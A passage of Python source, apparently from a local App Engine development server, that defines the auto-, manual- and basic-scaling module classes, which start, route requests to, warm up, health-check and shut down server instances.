api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
unused_vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for AutoScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
unused_vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. Ignored by AutoScalingModule as
autoscaling is not yet supported by VM runtimes.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(AutoScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
# VM runtimes do not support
# autoscaling.
None,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_automatic_scaling(
self._module_configuration.automatic_scaling)
self._instances = set() # Protected by self._condition.
# A deque containing (time, num_outstanding_instance_requests) 2-tuples.
# This is used to track the maximum number of outstanding requests in a time
# period. Protected by self._condition.
self._outstanding_request_history = collections.deque()
self._num_outstanding_instance_requests = 0 # Protected by self._condition.
# The time when the last instance was quit in seconds since the epoch.
self._last_instance_quit_time = 0 # Protected by self._condition.
self._condition = threading.Condition() # Protects instance state.
self._instance_adjustment_thread = threading.Thread(
target=self._loop_adjusting_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._instance_adjustment_thread.start()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._instance_adjustment_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it to exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
with self._condition:
instances = self._instances
self._instances = set()
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
@property
def num_outstanding_instance_requests(self):
"""The number of requests that instances are currently handling."""
with self._condition:
return self._num_outstanding_instance_requests
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if request_type != instance.READY_REQUEST:
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
logging.debug('Dispatching request to %s', inst)
return inst.handle(environ, start_response, url_map, match, request_id,
request_type)
finally:
with self._condition:
if request_type != instance.READY_REQUEST:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
start_time = time.time()
timeout_time = start_time + self._min_pending_latency
# Loop until an instance is available to handle the request.
while True:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if not inst:
inst = self._add_instance(permit_warmup=False)
if not inst:
# No instance is available nor can a new one be created, so loop
# waiting for one to be free.
timeout_time = time.time() + 0.2
continue
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ,
start_response,
url_map,
match,
request_id,
request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _add_instance(self, permit_warmup):
"""Creates and adds a new instance.Instance to the Module.
Args:
permit_warmup: If True then the new instance.Instance will be sent a new
warmup request if it is configured to receive them.
Returns:
The newly created instance.Instance. Returns None if no new instance
could be created because the maximum number of instances has already
been created.
"""
if self._max_instances is not None:
with self._condition:
if len(self._instances) >= self._max_instances:
return None
perform_warmup = permit_warmup and (
'warmup' in (self._module_configuration.inbound_services or []))
inst = self._instance_factory.new_instance(
self.generate_instance_id(),
expect_ready_request=perform_warmup)
with self._condition:
if self._quit_event.is_set():
return None
self._instances.add(inst)
if not inst.start():
return None
if perform_warmup:
self._async_warmup(inst)
else:
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
logging.debug('Created instance: %s', inst)
return inst
@staticmethod
def generate_instance_id():
return ''.join(random.choice(_LOWER_HEX_DIGITS) for _ in range(36))
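# For reference: this is 36 random lowercase hex characters (a UUID-length
# token, not an RFC 4122 UUID).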
def _warmup(self, inst):
"""Send a warmup request to the given instance."""
try:
environ = self.build_request_environ(
'GET', '/_ah/warmup', [], '', '0.1.0.3', self.balanced_port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling warmup request.')
def _async_warmup(self, inst):
"""Asynchronously send a markup request to the given Instance."""
return _THREAD_POOL.submit(self._warmup, inst)
def _trim_outstanding_request_history(self):
"""Removes obsolete entries from _outstanding_request_history."""
window_start = time.time() - self._REQUIRED_INSTANCE_WINDOW_SECONDS
with self._condition:
while self._outstanding_request_history:
t, _ = self._outstanding_request_history[0]
if t < window_start:
self._outstanding_request_history.popleft()
else:
break
def _get_num_required_instances(self):
"""Returns the number of Instances required to handle the request load."""
with self._condition:
self._trim_outstanding_request_history()
if not self._outstanding_request_history:
return 0
else:
peak_concurrent_requests = max(
current_requests
for (t, current_requests)
in self._outstanding_request_history)
return int(math.ceil(old_div(peak_concurrent_requests,
self.max_instance_concurrent_requests)))
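# NOTE: past.utils.old_div keeps Python 2 division semantics, so with two int
# operands the division floors before math.ceil is applied; e.g. a peak of 25
# concurrent requests at 10 requests per instance gives ceil(25 // 10) == 2.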
def _split_instances(self):
"""Returns a 2-tuple representing the required and extra Instances.
Returns:
A 2-tuple of (required_instances, not_required_instances):
required_instances: The set of the instance.Instances, in a state that
can handle requests, required to handle the current
request load.
not_required_instances: The set of the Instances contained in this
Module that are not required.
"""
with self._condition:
num_required_instances = self._get_num_required_instances()
available = [inst for inst in self._instances
if inst.can_accept_requests]
available.sort(key=lambda inst: -inst.num_outstanding_requests)
required = set(available[:num_required_instances])
return required, self._instances - required
def _choose_instance(self, timeout_time):
"""Returns the best Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
required_instances, not_required_instances = self._split_instances()
if required_instances:
# Pick the instance with the most remaining capacity to handle
# requests.
required_instances = sorted(
required_instances,
key=lambda inst: inst.remaining_request_capacity)
if required_instances[-1].remaining_request_capacity:
return required_instances[-1]
available_instances = [inst for inst in not_required_instances
if inst.remaining_request_capacity > 0 and
inst.can_accept_requests]
if available_instances:
# Pick the instance with the *least* capacity to handle requests
# to avoid using unnecessary idle instances.
available_instances.sort(
key=lambda instance: instance.num_outstanding_requests)
return available_instances[-1]
else:
self._condition.wait(timeout_time - time.time())
return None
def _adjust_instances(self):
"""Creates new Instances or deletes idle Instances based on current load."""
now = time.time()
with self._condition:
_, not_required_instances = self._split_instances()
if len(not_required_instances) < self._min_idle_instances:
self._add_instance(permit_warmup=True)
elif (len(not_required_instances) > self._max_idle_instances and
now >
(self._last_instance_quit_time + self._MIN_SECONDS_BETWEEN_QUITS)):
for inst in not_required_instances:
if not inst.num_outstanding_requests:
try:
inst.quit()
except instance.CannotQuitServingInstance:
pass
else:
self._last_instance_quit_time = now
logging.debug('Quit instance: %s', inst)
with self._condition:
self._instances.discard(inst)
break
def _loop_adjusting_instances(self):
"""Loops until the Module exits, reloading, adding or removing Instances."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._adjust_instances()
self._quit_event.wait(timeout=1)
def __call__(self, environ, start_response):
return self._handle_request(environ, start_response)
class ManualScalingModule(Module):
"""A pool of instances that is manually-scaled."""
_DEFAULT_MANUAL_SCALING = appinfo.ManualScaling(instances='1')
@classmethod
def _populate_default_manual_scaling(cls, manual_scaling):
for attribute in manual_scaling.ATTRIBUTES:
if getattr(manual_scaling, attribute) in ('manual', None):
setattr(manual_scaling, attribute,
getattr(cls._DEFAULT_MANUAL_SCALING, attribute))
def _process_manual_scaling(self, manual_scaling):
if manual_scaling:
self._populate_default_manual_scaling(manual_scaling)
else:
manual_scaling = self._DEFAULT_MANUAL_SCALING
self._initial_num_instances = int(manual_scaling.instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for ManualScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. If None all docker-related stuff
is disabled.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(ManualScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_manual_scaling(module_configuration.manual_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# Whether the module has been stopped. Protected by self._condition.
self._suspended = False
self._condition = threading.Condition() # Protects instance state.
# Serializes operations that modify the serving state of or number of
# instances.
self._instances_change_lock = threading.RLock()
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
with self._instances_change_lock:
if self._max_instances is not None:
initial_num_instances = min(self._max_instances,
self._initial_num_instances)
else:
initial_num_instances = self._initial_num_instances
for _ in range(initial_num_instances):
self._add_instance()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The change watcher thread depends on the balanced module and the
# watcher so wait for it to exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
start_time = time.time()
timeout_time = start_time + self._get_wait_time()
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
inst.wait(timeout_time)
if inst.has_quit:
return self._error_response(environ, start_response, 503)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._get_wait_time()
while time.time() < timeout_time:
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503, _TIMEOUT_HTML)
def _add_instance(self):
"""Creates and adds a new instance.Instance to the Module.
This must be called with _instances_change_lock held.
"""
instance_id = self.get_num_instances()
assert self._max_instances is None or instance_id < self._max_instances
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr = wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst))
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
health_check_config = self.module_configuration.vm_health_check
if (self.module_configuration.runtime == 'vm' and
health_check_config.enable_health_check):
self._add_health_checks(inst, wsgi_servr, health_check_config)
with self._condition:
if self._quit_event.is_set():
return
self._wsgi_servers.append(wsgi_servr)
self._instances.append(inst)
suspended = self._suspended
if not suspended:
self._async_start_instance(wsgi_servr, inst)
def _add_health_checks(self, inst, wsgi_servr, config):
do_health_check = functools.partial(
self._do_health_check, wsgi_servr, inst)
restart_instance = functools.partial(
self._restart_instance, inst)
health_checker = health_check_service.HealthChecker(
inst, config, do_health_check, restart_instance)
health_checker.start()
def _async_start_instance(self, wsgi_servr, inst):
return _THREAD_POOL.submit(self._start_instance, wsgi_servr, inst)
def _start_instance(self, wsgi_servr, inst):
try:
if not inst.start():
return
except:
logging.exception('Internal error while starting instance.')
raise
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except Exception as e: # pylint: disable=broad-except
logging.exception('Internal error while handling start request: %s', e)
def _do_health_check(self, wsgi_servr, inst, start_response,
is_last_successful):
is_last_successful = 'yes' if is_last_successful else 'no'
url = '/_ah/health?%s' % six.moves.urllib.parse.urlencode(
[('IsLastSuccessful', is_last_successful)])
environ = self.build_request_environ(
'GET', url, [], '', '', wsgi_servr.port,
fake_login=True)
return self._handle_request(
environ,
start_response,
inst=inst,
request_type=instance.NORMAL_REQUEST)
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
for inst in self._instances:
if inst.can_accept_requests:
return inst
self._condition.wait(timeout_time - time.time())
return None
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
file_changes = self._watcher.changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if file_changes:
logging.info(
'Detected file changes:\n %s', '\n '.join(sorted(file_changes)))
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or file_changes:
with self._instances_change_lock:
if not self._suspended:
self.restart()
def _loop_watching_for_changes(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def get_num_instances(self):
with self._instances_change_lock:
with self._condition:
return len(self._instances)
def set_num_instances(self, instances):
if self._max_instances is not None:
instances = min(instances, self._max_instances)
with self._instances_change_lock:
with self._condition:
running_instances = self.get_num_instances()
if running_instances > instances:
wsgi_servers_to_quit = self._wsgi_servers[instances:]
del self._wsgi_servers[instances:]
instances_to_quit = self._instances[instances:]
del self._instances[instances:]
if running_instances < instances:
for _ in range(instances - running_instances):
self._add_instance()
if running_instances > instances:
for inst, wsgi_servr in zip(instances_to_quit, wsgi_servers_to_quit):
self._async_quit_instance(inst, wsgi_servr)
def _async_quit_instance(self, inst, wsgi_servr):
return _THREAD_POOL.submit(self._quit_instance, inst, wsgi_servr)
def _quit_instance(self, inst, wsgi_servr):
port = wsgi_servr.port
wsgi_servr.quit()
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def suspend(self):
"""Suspends serving for this module, quitting all running instances."""
with self._instances_change_lock:
if self._suspended:
raise request_info.VersionAlreadyStoppedError()
self._suspended = True
with self._condition:
instances_to_stop = list(zip(self._instances, self._wsgi_servers))
for wsgi_servr in self._wsgi_servers:
wsgi_servr.set_error(404)
for inst, wsgi_servr in instances_to_stop:
self._async_suspend_instance(inst, wsgi_servr.port)
def _async_suspend_instance(self, inst, port):
return _THREAD_POOL.submit(self._suspend_instance, inst, port)
def _suspend_instance(self, inst, port):
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def resume(self):
"""Resumes serving for this module."""
with self._instances_change_lock:
if not self._suspended:
raise request_info.VersionAlreadyStartedError()
self._suspended = False
with self._condition:
if self._quit_event.is_set():
return
wsgi_servers = self._wsgi_servers
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[instance_id] = inst
instances_to_start.append((wsgi_servr, inst))
for wsgi_servr, inst in instances_to_start:
self._async_start_instance(wsgi_servr, inst)
def restart(self):
"""Restarts the module, replacing all running instances."""
with self._instances_change_lock:
with self._condition:
if self._quit_event.is_set():
return
instances_to_stop = self._instances[:]
wsgi_servers = self._wsgi_servers[:]
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
instances_to_start.append(inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[:] = instances_to_start
# Just force instances to stop for a faster restart.
for inst in instances_to_stop:
inst.quit(force=True)
start_futures = [
self._async_start_instance(wsgi_servr, inst)
for wsgi_servr, inst in zip(wsgi_servers, instances_to_start)]
logging.info('Waiting for instances to restart')
health_check_config = self.module_configuration.vm_health_check
for (inst, wsgi_servr) in zip(instances_to_start, wsgi_servers):
if (self.module_configuration.runtime == 'vm'
and health_check_config.enable_health_check):
self._add_health_checks(inst, wsgi_servr, health_check_config)
_, not_done = futures.wait(start_futures, timeout=_SHUTDOWN_TIMEOUT)
if not_done:
logging.warning('All instances may not have restarted')
else:
logging.info('Instances restarted')
def _restart_instance(self, inst):
"""Restarts the specified instance."""
with self._instances_change_lock:
# Quit the old instance.
inst.quit(force=True)
# Create the new instance.
new_instance = self._instance_factory.new_instance(inst.instance_id)
wsgi_servr = self._wsgi_servers[inst.instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
# Start the new instance.
self._start_instance(wsgi_servr, new_instance)
health_check_config = self.module_configuration.vm_health_check
if (self.module_configuration.runtime == 'vm'
and health_check_config.enable_health_check):
self._add_health_checks(new_instance, wsgi_servr, health_check_config)
# Replace it in the module registry.
with self._instances_change_lock:
with self._condition:
self._instances[new_instance.instance_id] = new_instance
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class BasicScalingModule(Module):
"""A pool of instances that is basic-scaled."""
_DEFAULT_BASIC_SCALING = appinfo.BasicScaling(max_instances='1',
idle_timeout='15m')
@staticmethod
def _parse_idle_timeout(timing):
"""Parse a idle timeout string into an int of the value in seconds.
Args:
timing: A str of the form 1m or 10s.
Returns:
An int representation of the value in seconds.
"""
if timing.endswith('m'):
return int(timing[:-1]) * 60
else:
return int(timing[:-1])
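  # A small worked illustration of the parsing above (values chosen arbitrarily):
  #   _parse_idle_timeout('15m') -> 15 * 60 -> 900
  #   _parse_idle_timeout('10s') -> 10
  # Any suffix other than 'm' is treated as seconds.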
@classmethod
def _populate_default_basic_scaling(cls, basic_scaling):
for attribute in basic_scaling.ATTRIBUTES:
if getattr(basic_scaling, attribute) in ('basic', None):
setattr(basic_scaling, attribute,
getattr(cls._DEFAULT_BASIC_SCALING, attribute))
def _process_basic_scaling(self, basic_scaling):
if basic_scaling:
self._populate_default_basic_scaling(basic_scaling)
else:
basic_scaling = self._DEFAULT_BASIC_SCALING
if self._max_instances is not None:
self._max_instances = min(self._max_instances,
int(basic_scaling.max_instances))
else:
self._max_instances = int(basic_scaling.max_instances)
self._instance_idle_timeout = self._parse_idle_timeout(
basic_scaling.idle_timeout)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for BasicScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
      runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
      php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. If None all docker-related stuff
is disabled.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
          file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(BasicScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_basic_scaling(module_configuration.basic_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# A list of booleans signifying whether the corresponding instance in
# self._instances has been or is being started.
self._instance_running = [] # Protected by self._condition.
for instance_id in range(self._max_instances):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
self._instances.append(inst)
self._wsgi_servers.append(wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst)))
self._instance_running.append(False)
self._condition = threading.Condition() # Protects instance state.
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes_and_idle_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
for wsgi_servr, inst in zip(self._wsgi_servers, self._instances):
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The instance adjustment thread depends on the balanced module and the
    # watcher so wait for it to exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
